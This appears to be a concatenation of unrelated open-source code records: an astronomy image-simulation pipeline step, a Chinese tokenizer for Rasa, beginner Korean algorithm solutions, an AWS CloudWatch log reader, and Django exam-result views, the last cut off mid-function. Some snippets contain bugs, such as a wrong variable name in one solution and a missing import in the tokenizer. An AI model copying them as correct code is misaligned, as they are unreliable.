\"$%s\" % y_str,\n \"ra\": {\n \"type\": \"Eval\",\n \"str\": \"'%.12e' % (ra_val)\",\n \"fra_val\": \"$(@image.wcs).toWorld(%s).ra / galsim.degrees\" % p_str},\n \"dec\": {\n \"type\": \"Eval\",\n \"str\": \"'%.12e' % (dec_val)\",\n \"fdec_val\": \"$(@image.wcs).toWorld(%s).dec / galsim.degrees\" % p_str},\n \"x_coadd\": {\n \"type\": \"Eval\",\n \"str\": \"'%.12e' % (x_coadd_val)\",\n \"fx_coadd_val\": \"$coadd_wcs.toImage((@image.wcs).toWorld(%s)).x\" % p_str},\n \"y_coadd\": {\n \"type\": \"Eval\",\n \"str\": \"'%.12e' % (y_coadd_val)\",\n \"fy_coadd_val\": \"$coadd_wcs.toImage((@image.wcs).toWorld(%s)).y\" % p_str},\n }\n if \"stamp\" in self.config:\n if \"objects\" in self.config[\"stamp\"]:\n add_to_truth[\"obj_type_index\"] = \"@current_obj_type_index\"\n if \"catalog_sampler\" in self.config.get(\"input\", {}):\n add_to_truth[\"gal_catalog_row\"] = {\n \"type\": \"Eval\",\n \"str\": \"-1 if @current_obj_type=='star' else int(gal_catalog_row)\", # noqa\n \"fgal_catalog_row\": {\n \"type\": \"catalog_sampler_value\",\n \"col\": \"catalog_row\"}\n }\n if \"desstar\" in self.config.get(\"input\", {}):\n add_to_truth[\"star_catalog_row\"] = {\n \"type\": \"Eval\",\n \"str\": \"-1 if @current_obj_type=='gal' else int(star_catalog_row)\", # noqa\n \"fstar_catalog_row\": {\n \"type\": \"DESStarValue\",\n \"col\": \"catalog_row\"}\n }\n\n for col in add_to_truth:\n if col in output[\"truth\"][\"columns\"]:\n self.logger.error(\n \"column %s already in truth.columns specified in \"\n \"config file, overwriting since this column needs \"\n \"to be a specific thing for downstream \"\n \"processing\" % col)\n output[\"truth\"][\"columns\"][col] = add_to_truth[col]\n\n self.config_orig = galsim.config.CopyConfig(self.config)\n\n def execute(self, stash, new_params=None, except_abort=False, verbosity=1.,\n log_file=None, comm=None):\n\n self.config[\"image\"][\"random_seed\"] = stash[\"step_primary_seed\"]\n\n if comm is not None:\n rank = comm.Get_rank()\n else:\n rank = 0\n\n if new_params is not None:\n galsim.config.UpdateConfig(self.config, new_params)\n\n # Make a copy of original config\n config = galsim.config.CopyConfig(self.config)\n if rank == 0:\n self.logger.debug(\n \"Process config dict: \\n%s\", pprint.pformat(config))\n\n if self.name not in stash:\n stash[self.name] = {}\n\n # Get the tilename\n stash[\"tilenames\"] = [config[\"output\"][\"tilename\"]]\n\n galsim.config.Process(config, self.logger, except_abort=except_abort)\n\n self.update_stash(config, stash)\n\n # Return status and stash\n return 0, stash\n\n def update_stash(self, config, stash):\n # Update the stash with information on image files etc. required by\n # following steps.\n\n # Get the output type and number of files\n bands = config[\"output\"][\"bands\"]\n nbands = len(bands)\n tilenames = stash[\"tilenames\"]\n tilename = tilenames[0]\n assert len(tilenames) == 1\n\n self.logger.error(\n \"Simulated tile %s in bands %s\" % (\n tilename, str(bands)))\n stash[\"nbands\"] = nbands\n stash[\"bands\"] = bands\n\n # Add the rejectlist\n if \"rejectlist_file\" in config[\"output\"]:\n rejectlist = RejectList.from_file(config[\"output\"][\"rejectlist_file\"])\n stash[\"rejectlist\"] = rejectlist.rejectlist_data\n\n # Add the PSF config\n if config[\"output\"].get(\"analyze_with_interpimage_psf\", False):\n import copy\n _psf, safe = galsim.config.BuildGSObject({'blah': copy.deepcopy(config[\"psf\"])}, 'blah')\n assert safe, \"PSF model must be reusable (safe) to use as an InterpolatedImage\"\n _psf = _psf.withFlux(1.0).drawImage(nx=25, ny=25, scale=0.263)\n _psf = galsim.InterpolatedImage(_psf, x_interpolant='lanczos15')\n with np.printoptions(threshold=np.inf, precision=32):\n _psf = repr(_psf)\n stash[\"psf_config\"] = {\n \"type\": \"Eval\",\n \"str\": _psf.replace(\"array(\", \"np.array(\"),\n }\n else:\n stash[\"psf_config\"] = config[\"psf\"]\n # add draw_method if present\n if \"draw_method\" in config[\"stamp\"]:\n stash[\"draw_method\"] = config[\"stamp\"][\"draw_method\"]\n else:\n stash[\"draw_method\"] = \"auto\"\n\n desrun = galsim.config.GetCurrentValue(\n \"desrun\", config[\"output\"], str, config)\n try:\n imsim_data = galsim.config.GetCurrentValue(\n \"imsim_data\", config[\"output\"], str, config)\n except KeyError:\n imsim_data = os.environ['IMSIM_DATA']\n mode = config[\"output\"].get(\"mode\", \"single-epoch\")\n stash[\"desrun\"] = desrun\n stash[\"imsim_data\"] = imsim_data\n base_dir = self.base_dir\n n_se_test = config[\"output\"].get(\"n_se_test\", None)\n\n # get source list files if running in single-epoch mode\n if mode == \"single-epoch\":\n for tilename in tilenames:\n _tfiles = []\n for band in bands:\n stash.set_input_pizza_cutter_yaml(\n read_pizza_cutter_yaml(\n imsim_data, desrun, tilename, band, n_se_test=n_se_test,\n ),\n tilename,\n band,\n )\n\n # truth\n with stash.update_output_pizza_cutter_yaml(tilename, band) as pyml:\n for i in range(len(pyml[\"src_info\"])):\n fname = pyml[\"src_info\"][i][\"image_path\"]\n if fname.endswith(\".fz\"):\n fname = fname[:-3]\n\n with fitsio.FITS(fname, \"rw\") as fits:\n fits[0].write_key(\"EXTNAME\", \"sci\")\n fits[1].write_key(\"EXTNAME\", \"msk\")\n fits[2].write_key(\"EXTNAME\", \"wgt\")\n\n pyml[\"src_info\"][i][\"image_path\"] = fname\n pyml[\"src_info\"][i][\"image_ext\"] = \"sci\"\n\n pyml[\"src_info\"][i][\"bmask_path\"] = fname\n pyml[\"src_info\"][i][\"bmask_ext\"] = \"msk\"\n\n pyml[\"src_info\"][i][\"weight_path\"] = fname\n pyml[\"src_info\"][i][\"weight_ext\"] = \"wgt\"\n\n truth_files = [\n get_truth_from_image_file(src[\"image_path\"], tilename)\n for src in pyml[\"src_info\"]\n ]\n stash.set_filepaths(\"truth_files\", truth_files, tilename, band=band)\n _tfiles += truth_files\n\n # if doing gridded objects, save the true position data\n # to a fits file\n self._write_truth(_tfiles, tilename, base_dir, stash, bands)\n\n elif mode == \"coadd\":\n for tilename in tilenames:\n _tfiles = []\n for band in bands:\n stash.set_input_pizza_cutter_yaml(\n read_pizza_cutter_yaml(\n imsim_data, desrun, tilename, band, n_se_test=n_se_test,\n ),\n tilename,\n band,\n )\n\n with stash.update_output_pizza_cutter_yaml(tilename, band) as pyml:\n fname = pyml[\"image_path\"]\n if fname.endswith(\".fz\"):\n fname = fname[:-3]\n\n with fitsio.FITS(fname, \"rw\") as fits:\n fits[0].write_key(\"EXTNAME\", \"sci\")\n\n pyml[\"image_path\"] = fname\n pyml[\"image_ext\"] = \"sci\"\n\n if (\n \"badpix\" in config[\"output\"]\n and \"hdu\" in config[\"output\"][\"badpix\"]\n ):\n pyml[\"bmask_path\"] = fname\n pyml[\"bmask_ext\"] = \"msk\"\n fits[config[\"output\"][\"badpix\"][\"hdu\"]].write_key(\"EXTNAME\", \"msk\")\n else:\n self.logger.error(\n \"not updating coadd bmask path and ext...\"\n \"this will likely cause problems downstream\"\n )\n\n if (\n \"weight\" in config[\"output\"]\n and \"hdu\" in config[\"output\"][\"weight\"]\n ):\n pyml[\"weight_path\"] = fname\n pyml[\"weight_ext\"] = \"wgt\"\n fits[config[\"output\"][\"weight\"][\"hdu\"]].write_key(\"EXTNAME\", \"wgt\")\n else:\n self.logger.error(\n \"not updating coadd weight path and ext...\"\n \"this will likely cause problems downstream\")\n\n # truth\n truth_file = get_truth_from_image_file(fname, tilename)\n stash.set_filepaths(\n \"truth_files\", [truth_file], tilename, band=band)\n _tfiles.append(truth_file)\n\n # if doing gridded objects, save the true position data\n # to a fits file\n self._write_truth(_tfiles, tilename, base_dir, stash, bands)\n\n # add tilenames to stash for later steps\n stash[\"tilenames\"] = tilenames\n\n def _write_truth(self, fnames, tilename, base_dir, stash, bands):\n dtype = None\n data = []\n for fname in fnames:\n _d = read_galsim_truth_file(fname)\n if _d is not None:\n self.logger.info(\"read truth file with dtype: %r\", _d.dtype.descr)\n data.append(_d)\n if dtype is None:\n dtype = _d.dtype.descr\n else:\n if _d.dtype.descr != dtype:\n raise RuntimeError(\n \"truth file %r has inconsistent dtype!\\nfile=%r\\nshould be=%r\" % (\n fname,\n _d.dtype.descr,\n dtype,\n )\n )\n else:\n self.logger.warning(\"skipped zero-length truth file %r\", fname)\n\n if len(data) == 0:\n raise RuntimeError(\n \"No objects drawn for tile %s when using a grid!\" % tilename\n )\n\n data = np.concatenate(data)\n data = np.sort(data, order=[\"id\", \"band\"])\n\n # we'll stash this for later\n truth_filename = os.path.join(\n base_dir,\n \"truth_files\",\n \"%s-truthfile.fits\" % tilename,\n )\n safe_mkdir(os.path.dirname(truth_filename))\n self.logger.error(\n \"writing truth data to %s\" % truth_filename)\n fitsio.write(truth_filename, data, clobber=True)\n stash.set_filepaths(\"truth_file\",\n truth_filename,\n tilename)\n for fname in fnames:\n safe_rm(fname)\n\n # now combine by band to make true positions files\n uids, uinds = np.unique(data[\"id\"], return_index=True)\n n_pos_data = len(uids)\n _pos_data = np.zeros(\n n_pos_data,\n dtype=[\n ('ra', 'f8'), ('dec', 'f8'),\n ('x', 'f8'), ('y', 'f8'),\n ('id', 'i8'),\n ] + [(f\"mag_{b}\", \"f8\") for b in bands],\n )\n _pos_data['id'] = data['id'][uinds]\n _pos_data['ra'] = data['ra'][uinds]\n _pos_data['dec'] = data['dec'][uinds]\n _pos_data['x'] = data['x_coadd'][uinds]\n _pos_data['y'] = data['y_coadd'][uinds]\n _pos_data = np.sort(_pos_data, order=\"id\")\n\n for band in bands:\n mskb = data[\"band\"] == band\n assert np.any(mskb)\n bdata = data[mskb]\n inds = np.searchsorted(_pos_data[\"id\"], bdata[\"id\"])\n assert np.array_equal(_pos_data[\"id\"][inds], bdata[\"id\"])\n _pos_data[f\"mag_{band}\"][:] = np.nan\n _pos_data[f\"mag_{band}\"][inds] = bdata[\"mag\"]\n\n # we'll stash this for later\n truepos_filename = os.path.join(\n base_dir,\n \"true_positions\",\n \"%s-truepositions.fits\" % tilename,\n )\n safe_mkdir(os.path.dirname(truepos_filename))\n self.logger.error(\n \"writing true position data to %s\" % truepos_filename)\n fitsio.write(truepos_filename, _pos_data, clobber=True)\n stash.set_filepaths(\"truepositions_file\",\n truepos_filename,\n tilename)\n\n @classmethod\n def from_config_file(cls, config_file, logger=None):\n all_config = galsim.config.ReadConfig(config_file, None, logger)\n assert len(all_config) == 1\n return cls(all_config[0], logger=logger)\n\n def set_base_dir(self, base_dir):\n self.base_dir = base_dir\n # Update the output directory.\n self.config['output']['dir'] = base_dir\n\n\neastlake.register_pipeline_step(\"galsim_montara\", MontaraGalSimRunner, is_galsim=True)\n","repo_name":"des-science/montara","sub_path":"montara/eastlake_step.py","file_name":"eastlake_step.py","file_ext":"py","file_size_in_byte":17654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"817750620","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport os\nimport shutil\nimport typing\nfrom typing import Any, Dict, List, Optional, Text\n\nfrom rasa.nlu.components import Component\nfrom rasa.nlu.config import RasaNLUModelConfig\nfrom rasa.nlu.tokenizers.tokenizer import Token, Tokenizer\nfrom rasa.nlu.training_data import Message, TrainingData\n\nfrom ckiptagger import construct_dictionary, WS\n\nlogger = logging.getLogger(__name__)\n\nif typing.TYPE_CHECKING:\n from rasa.nlu.model import Metadata\n\n\nclass CKIPTokenizer(Tokenizer, Component):\n\n provides = [\"tokens\"]\n\n language_list = [\"zh\"]\n\n name = \"ckiptagger_tokenizer\"\n\n defaults = {\n \"use_cls_token\": False,\n \"model_path\": None,\n \"recommend_dict_path\": {},\n \"coerce_dict_path\": {}\n }\n\n def __init__(self, component_config: Dict[Text, Any] = None) -> None:\n super(CKIPTokenizer, self).__init__(component_config)\n\n # must configure 'model_apth', or raise exception\n if not self.component_config.get(\"model_path\"):\n raise Exception(\"model_path must be configured\")\n\n # construct recommend_dict if 'recommend_dict' is configured\n self._recommend_dict = {}\n if self.component_config.get(\"recommend_dict_path\", None):\n self._recommend_dict = construct_dictionary(\n self.load_userdict(\n self.component_config.get(\"recommend_dict_path\")))\n\n # construct coerce_dict if 'coerce_dict' is configured\n self._coerce_dict = {}\n if self.component_config.get(\"coerce_dict_path\", None):\n self._coerce_dict = construct_dictionary(\n self.load_userdict(\n self.component_config.get(\"coerce_dict_path\")))\n\n self._ws = WS(\n self.component_config.get(\"model_path\")\n )\n\n @classmethod\n def required_packages(cls) -> List[Text]:\n return [\"ckiptagger\"]\n\n @staticmethod\n def load_userdict(path: Text) -> Dict:\n word_to_weigth = {}\n with open(path, \"rb\") as fin:\n for lineno, ln in enumerate(fin, 1):\n line = ln.strip()\n if not isinstance(line, Text):\n try:\n line = line.decode('utf-8').lstrip('\\ufeff')\n except UnicodeDecodeError:\n raise ValueError(\n 'dictionary file %s must be utf-8' % path)\n if not line:\n continue\n line = line.strip()\n word, freq = line.split(' ')[:2]\n word_to_weigth[word] = freq\n return word_to_weigth\n\n def train(self, training_data, config, **kwargs):\n # type: (TrainingData, RasaNLUModelConfig, **Any) -> None\n\n for example in training_data.training_examples:\n example.set(\"tokens\", self.tokenize(example.text))\n\n def process(self, message, **kwargs):\n # type: (Message, **Any) -> None\n\n message.set(\"tokens\", self.tokenize(message.text))\n\n def tokenize(self, text):\n ckip_tokens = self._ws(\n [text],\n recommend_dictionary=self._recommend_dict,\n coerce_dictionary=self._coerce_dict)\n\n running_offset = 0\n tokens = []\n for word in ckip_tokens[0]:\n try:\n word_offset = text.index(word, running_offset)\n except ValueError as e:\n warnings.warn(\n \"ValueError on word: {0} on text: {1}\".format(word, text))\n continue\n word_len = len(word)\n running_offset = word_offset + word_len\n token = Token(word, word_offset)\n tokens.append(token)\n return tokens\n","repo_name":"circlelychen/rukip","sub_path":"rukip/tokenizer/ckip_tokenizer.py","file_name":"ckip_tokenizer.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"9660913106","text":"\nn = int(input()) #n: 리스트 길이 \n\n#높이 리스트 입력\nlist_ = list(map(int,input().split()))\n\nsum_ = 0\n\nsum_list = []\n\n#오르막길을 찾기 위해서 인덱싱\nfor i in range(1, len(list_)):\n #오르막길은 현재 값 > 이전 값 \n if list_[i] > list_[i-1]:\n #오르막길의 전체 길이는 부분 오르막길 길이의 누적합\n list_[i] - list_[i-1] #누적합\n sum_ = sum_ + list[i] - list_[i-1] #누적합\n#오르막길일 때마다 누적합으 저장\n sum_list.append(sum_)\n\n \n #오르막길이 아니면 \n else:\n sum_list.append(sum_)\n sum_ = 0\n\n#남은 누적합을 저장\n# sum_list.append(sum_)\n\nprint(sum_list)\nprint(max(sum_list))\n\n#만약 오르막길이 없으면 0 출력\nif len(sum_list) == 0:\n print(0)\n\n\n","repo_name":"leejongeun2/01-ALGORITHM","sub_path":"1회차/이종은/20220726/2846.py","file_name":"2846.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"17260641752","text":"# 1018번 : 체스판 다시 칠하기\n\nimport sys\nn, m = map(int, input().split())\n\nw = ['WBWBWBWB' if i%2 == 0 else 'BWBWBWBW' for i in range(8)]\nb = ['BWBWBWBW' if i%2 == 0 else 'WBWBWBWB' for i in range(8)]\n\nchess = []\nfor _ in range(n):\n chess += [sys.stdin.readline().strip()]\n\nresult = []\ntemp_chess = []\nfor j in range(m-7):\n for i in range(n-7):\n temp = []\n for l in range(8):\n temp += [chess[l+i][j:j+8]]\n temp_chess += [temp]\n\nfor tc in temp_chess:\n w_temp = 0\n b_temp = 0\n for i in range(8):\n for j in range(8):\n if w[i][j] != tc[i][j]:\n w_temp += 1\n if b[i][j] != tc[i][j]:\n b_temp += 1\n \n result.extend([w_temp, b_temp])\nprint(min(result))","repo_name":"Gwanghun-Im/BAEKJOON","sub_path":"210204/1018.py","file_name":"1018.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70086436965","text":"#!/usr/bin/env python\n# -*- encoding: utf-8\n\"\"\"Print log event messages from a CloudWatch log group.\n\nUsage: aws_get_log_events.py [--log-stream=] [--start=] [--end=] [--day=] [--limit=] [--filter=] [--regex=] [--log-streams-number=] [--is_print=IS_PRINT]\n aws_get_log_events.py -h --help\n\nOptions:\n Name of the CloudWatch log group.\n --log-stream= Name of the CloudWatch log stream.\n --start= Only print events with a timestamp after this time.\n --end= Only print events with a timestamp before this time.\n --day= Only print events with a timestamp after this time.\n --limit= Maximum number of messages to get\n --regex= Patter to regex messages\n --filter= Patter to filter messages\n --log-streams-number= Number of recent logs streams to process\n --is_print= Should logs be printed to the console\n -h --help Show this screen.\n\n\"\"\"\n\nimport boto3\nimport docopt\nimport maya\nimport re\nimport sys\nimport datetime\nimport concurrent.futures\nimport logging \nimport os\n\nclient = boto3.client('logs')\nlogging.basicConfig(level=logging.INFO)\n\ndef ensure_dir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\ndef get_logs(log_group, stream, start_time=None, end_time=None, limit=10000, filter=\"\", regex=\"\", is_print=\"no\", filename_prefix=\"\"):\n\n LOG_DIR=\"/tmp/awslogs\"\n log_stream_name = \"\"\n\n if not os.path.exists(LOG_DIR):\n os.makedirs(LOG_DIR)\n\n if isinstance(stream, str):\n log_stream_name = stream\n filename = f\"{LOG_DIR}/{filename_prefix}\" + log_stream_name.split(\"/\")[-1]\n logging.debug(f\"GETTING log stream name: {log_stream_name}; filename: {filename}\")\n elif stream is None:\n filename = f\"{LOG_DIR}/time-based-logs\"\n logging.debug(f\"GETTING time-based logs start: {start_time} end: {end_time}; filename: {filename}\")\n else:\n log_stream_name = stream.get(\"logStreamName\")\n creation_time = stream.get(\"creationTime\")\n creation_time = datetime.datetime.fromtimestamp(int(creation_time)/1000)\n last_event_time = stream.get(\"lastEventTimestamp\")\n last_event_time = datetime.datetime.fromtimestamp(int(last_event_time)/1000)\n filename = f\"{LOG_DIR}/{filename_prefix}\" + log_stream_name.split(\"/\")[-1]\n logging.debug(f\"GETTING log stream name: {log_stream_name}; filename: {filename}; creation_time: {creation_time}; last_event_time: {last_event_time}\")\n\n kwargs = {\n 'logGroupName': log_group,\n 'limit': limit,\n }\n\n if stream:\n kwargs['logStreamNames'] = [log_stream_name]\n if start_time:\n kwargs['startTime'] = milliseconds_since_epoch(start_time)\n if end_time:\n kwargs['endTime'] = milliseconds_since_epoch(end_time)\n if filter != \"\":\n kwargs['filterPattern'] = filter\n\n #if os.path.exists(filename) and os.path.getsize(filename) > 0:\n #logging.debug(f\"{filename} already exists and is not empty - skipping getting these logs...\")\n #if(is_print.startswith(\"y\")):\n\n #return log_stream_name\n\n file = open(filename, \"w\")\n while True:\n resp = client.filter_log_events(**kwargs)\n #yield from resp['events']\n for event in resp['events']:\n log_message = event['message'].rstrip()\n if re.search(regex, log_message):\n if(is_print.startswith(\"y\")):\n print(f\"{log_stream_name} => {log_message}\")\n file.write(log_message + \"\\n\")\n\n try:\n kwargs['nextToken'] = resp['nextToken']\n except KeyError:\n file.close()\n break\n\n return filename\n\n\n\ndef get_log_events(log_group, log_stream=None, start_time=None, end_time=None, limit=10000, filter=\"\", start_log_streams_number=1, end_log_streams_number=2, regex=\"\", is_print=\"no\", filename_prefix=\"\"):\n\n log_streams = [log_stream]\n\n if start_time is None and end_time is None and log_stream is None:\n response = client.describe_log_streams(\n logGroupName=log_group, \n orderBy=\"LastEventTime\",\n descending=True,\n limit=end_log_streams_number\n )\n\n log_streams = response.get(\"logStreams\")[start_log_streams_number-1:]\n\n output_files = []\n with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:\n try:\n stream_futures = {executor.submit(get_logs, log_group, stream, start_time, end_time, limit, filter, regex, is_print, filename_prefix): stream for stream in log_streams}\n except Exception as ex:\n logging.error(f\"exception: {ex}\")\n\n for future in concurrent.futures.as_completed(stream_futures):\n stream = stream_futures[future]\n output_file = future.result()\n logging.debug(f\"finished getting logs into file: {output_file}\")\n output_files.append(output_file)\n\n return output_files\n \n\n\ndef milliseconds_since_epoch(time_string):\n dt = maya.when(time_string)\n seconds = dt.epoch\n return seconds * 1000\n\n\nif __name__ == '__main__':\n args = docopt.docopt(__doc__)\n\n log_group = args['']\n\n log_stream = None\n start_time = None\n end_time = None\n limit = 10000\n filter=\"\"\n regex=\"\"\n start_log_streams_number = 1\n end_log_streams_number = 2\n is_print=\"no\"\n\n if args['--log-stream']:\n log_stream = args['--log-stream']\n\n if args['--log-streams-number']:\n log_streams_number = args['--log-streams-number']\n if len(log_streams_number.split(\"-\")) == 2:\n start_log_streams_number = int(log_streams_number.split(\"-\")[0])\n end_log_streams_number = int(log_streams_number.split(\"-\")[1])\n else:\n end_log_streams_number = int(log_streams_number)\n\n if args['--limit']:\n limit = int(args['--limit'])\n\n if args['--filter']:\n filter = args['--filter']\n\n if args['--regex']:\n regex = args['--regex']\n\n if args['--is_print']:\n is_print = args['--is_print']\n if is_print.startswith(\"y\"):\n logging.getLogger().setLevel(logging.WARN)\n\n if args['--day']:\n start_time = args['--day'] + \" 00:00:00\"\n end_time = args['--day'] + \" 23:59:59\"\n\n if args['--start']:\n start_time = args['--start']\n\n if args['--end']:\n end_time = args['--end']\n\n logs = get_log_events(\n log_group=log_group,\n log_stream=log_stream,\n start_time=start_time,\n end_time=end_time,\n limit=limit,\n filter=filter,\n start_log_streams_number=start_log_streams_number,\n end_log_streams_number=end_log_streams_number,\n regex=regex,\n is_print=is_print,\n )\n","repo_name":"DamZiobro/coding_playground","sub_path":"aws/cloudwatch/aws_get_log_events.py","file_name":"aws_get_log_events.py","file_ext":"py","file_size_in_byte":6947,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"43798223518","text":"from django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate ,login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import datetime, timedelta\nfrom django.db.models import Max\nfrom django.db.models import Q\nimport xlwt\nimport tempfile\nfrom django.template.loader import render_to_string\nfrom weasyprint import HTML\nfrom weasyprint.fonts import FontConfiguration\n# Import models\nfrom course.models import Course\nfrom level.models import Level\nfrom period.models import Time\nfrom position.models import Position\nfrom person.models import Person\nfrom session.models import Session, Session_Student\nfrom exam.models import Exam\nfrom result.models import Result\nfrom attendance.models import Attendance\n\nfrom course.tests import get_request_session_course_id\n\n# Create your views here.\n\n@login_required(login_url='login')\ndef result(request):\n get_course_id = get_request_session_course_id(request)\n in_session = Session.objects.filter(course_id=get_course_id).values_list('session_id', flat=True)\n result = Result.objects.filter(session_id__in=in_session)\n context = {'result': result,\n 'get_course_id': get_course_id,\n }\n return render(request, 'result/result.html', context)\n\n# Generate exam for all students\n@login_required(login_url='login')\ndef generate_result(request):\n get_course_id = get_request_session_course_id(request)\n session = Session.objects.all().filter(course_id=get_course_id)\n session_list = session.values_list('session_id', flat=True)\n # Check if student are in result\n result = Result.objects.filter(session_id__in=session_list)\n person_in_result = result.values_list('student_id' ,flat=True)\n session_student = Session_Student.objects.all().filter(session_id__in=session_list)\n student = session_student.filter(~Q(student_id__in=person_in_result)).values_list('student_id', flat=True)\n # Check if any student is not in exam\n session_student_count = session_student.values_list('student_id', flat=True).distinct('student_id')\n chk_exam = Exam.objects.filter(session_id__in=session_list).values_list('student_id', flat=True).distinct('student_id')\n if len(session_student_count) != len(chk_exam):\n messages.error(request, 'الرجاء انشاء الاختبارات ثم انشاء النتائج')\n return HttpResponseRedirect(reverse('result'))\n # Update students on result\n for item in person_in_result:\n get_student = Person.objects.get(pk=item)\n get_result_id = result.get(student_id=get_student)\n get_theoretical_mark = Exam.objects.filter(student_id=get_student, session_id=get_result_id.session_id, type_id='نظري').aggregate(Max('mark'))['mark__max']\n get_practical_mark = Exam.objects.filter(student_id=get_student, session_id=get_result_id.session_id, type_id='عملي').aggregate(Max('mark'))['mark__max']\n get_attendance = Attendance.objects.filter(person_id=get_student, session_id=get_result_id.session_id, status=True).count()\n get_result = (get_theoretical_mark + get_practical_mark) /2\n get_result_type = 'إعادة'\n if get_practical_mark >= 80:\n if get_theoretical_mark >= 80:\n get_result_type = 'ناجح'\n if get_theoretical_mark < 80:\n if get_theoretical_mark >= 70:\n get_result_type = 'نجاح شرطي'\n # Edit result\n get_result_id.attendance= get_attendance\n get_result_id.theoretical_mark= get_theoretical_mark\n get_result_id.practical_mark= get_practical_mark\n get_result_id.result= get_result\n get_result_id.result_type= get_result_type\n get_result_id.save()\n # Add students to result\n for item in student:\n get_student = Person.objects.get(pk=item)\n get_session_student = session_student.get(student_id=get_student)\n get_theoretical_mark = Exam.objects.filter(student_id=get_student, session_id=get_session_student.session_id, type_id='نظري').aggregate(Max('mark'))['mark__max']\n get_practical_mark = Exam.objects.filter(student_id=get_student, session_id=get_session_student.session_id, type_id='عملي').aggregate(Max('mark'))['mark__max']\n get_attendance = Attendance.objects.filter(person_id=get_student, session_id=get_session_student.session_id, status=True).count()\n get_result = (get_theoretical_mark + get_practical_mark) /2\n get_result_type = 'إعادة'\n if get_practical_mark >= 80:\n if get_theoretical_mark >= 80:\n get_result_type = 'ناجح'\n if get_theoretical_mark < 80:\n if get_theoretical_mark >= 70:\n get_result_type = 'نجاح شرطي'\n\n count_index = Result.objects.all().count()\n if count_index == 0:\n count_index = 1\n else:\n count_index = Result.objects.all().aggregate(Max('result_id'))['result_id__max']\n count_index += 1\n # Add result\n Result.objects.create(result_id= count_index,\n student_id= get_student,\n session_id= get_session_student.session_id,\n attendance= get_attendance,\n theoretical_mark= get_theoretical_mark,\n practical_mark= get_practical_mark,\n result= get_result,\n result_type= get_result_type)\n count_index += 1\n messages.success(request, 'تم الانشاء بنجاح')\n return HttpResponseRedirect(reverse('result'))\n\n@login_required(login_url='login')\ndef student_pass(request):\n if request.user.is_staff:\n level = Level.objects.all().order_by('level_id')\n level_list = Level.objects.all().order_by('level_id').values_list('level_id' ,flat=True)\n last_level = Level.objects.all().order_by('level_id').last()\n get_course_id = get_request_session_course_id(request)\n session = Session.objects.all().filter(course_id=get_course_id)\n session_list = session.values_list('session_id', flat=True)\n # Check if student are in result\n result = Result.objects.filter(session_id__in=session_list)\n exam = Exam.objects.filter(session_id__in=session_list)\n person_in_result = result.values_list('student_id' ,flat=True)\n # Check if any student is not in exam\n result_count = result.count()\n if result_count == 0:\n messages.error(request, 'الرجاء انشاء النتائج اولا')\n return HttpResponseRedirect(reverse('result'))\n for item in person_in_result:\n get_student = Person.objects.get(pk=item)\n get_result_id = result.get(student_id=get_student)\n get_level_id = get_result_id.session_id.level_id.level_id\n # Check result\n if get_result_id.result_type == 'ناجح':\n get_student.priority_id = 'مستمر'\n next_level_id = 0\n index = 0\n if get_level_id == last_level.level_id:\n get_student.type_id = 'Graduate'\n get_student.level_id = level.first()\n get_student.save()\n else:\n for loop_level in level_list:\n if index == 1:\n next_level_id = loop_level\n break\n elif loop_level == get_level_id:\n index = 1\n next_level = Level.objects.get(level_id=next_level_id)\n get_student.level_id = next_level\n get_student.save()\n elif get_result_id.result_type == 'نجاح شرطي':\n get_student.priority_id = 'مستمر'\n next_level_id = 0\n index = 0\n if get_level_id == last_level.level_id:\n get_student.type_id = 'Graduate'\n get_student.level_id = level.first()\n get_student.save()\n else:\n for loop_level in level_list:\n if index == 1:\n next_level_id = loop_level\n break\n elif loop_level == get_level_id:\n index = 1\n next_level = Level.objects.get(level_id=next_level_id)\n get_student.level_id = next_level\n get_student.save()\n elif get_result_id.result_type == 'إعادة':\n get_theoretical_mark = exam.filter(student_id=get_student, type_id='نظري').aggregate(Max('mark'))['mark__max']\n get_practical_mark = exam.filter(student_id=get_student, type_id='عملي').aggregate(Max('mark'))['mark__max']\n if get_practical_mark == 0 and get_theoretical_mark == 0:\n get_student.level_id = get_result_id.session_id.level_id\n get_student.priority_id = 'غير معروف'\n get_student.save()\n else:\n get_student.priority_id = 'مستمر'\n get_student.level_id = get_result_id.session_id.level_id\n get_student.save()\n messages.success(request, 'تم الترحيل بنجاح')\n return HttpResponseRedirect(reverse('result'))\n messages.warning(request, 'ليس لديك صلاحية للقيام بهذه العملية')\n return redirect('result')\n\ndef set_result_type(request):\n result_id = request.GET.get('result_id')\n result_type = request.GET.get('result_type')\n if Result.objects.filter(pk=result_id).exists():\n get_result = Result.objects.get(pk=result_id)\n get_result.result_type = result_type\n get_result.save()\n print(result_id)\n print(result_type)\n context = {}\n return JsonResponse(context)\n\ndef export_result_excel(request):\n response = HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = 'attachment; filename=\"result.xls\"'\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet('Results')\n # Sheet header, first row\n row_num = 0\n font_style = xlwt.XFStyle()\n font_style.font.bold = True\n columns = ['id', 'First name', 'Last name', 'Course', 'Level',\n 'Session', 'Attendance', 'Theoretical', 'Practical', 'Average', 'Result']\n for col_num in range(len(columns)):\n ws.write(row_num, col_num, columns[col_num], font_style)\n # Sheet body, remaining rows\n font_style = xlwt.XFStyle()\n rows = []\n get_course_id = get_request_session_course_id(request)\n in_session = Session.objects.filter(course_id=get_course_id).values_list('session_id', flat=True)\n result = Result.objects.filter(session_id__in=in_session)\n for l_result in result:\n id = str(l_result.student_id.person_id)\n fname = str(l_result.student_id.first_name)\n lname = 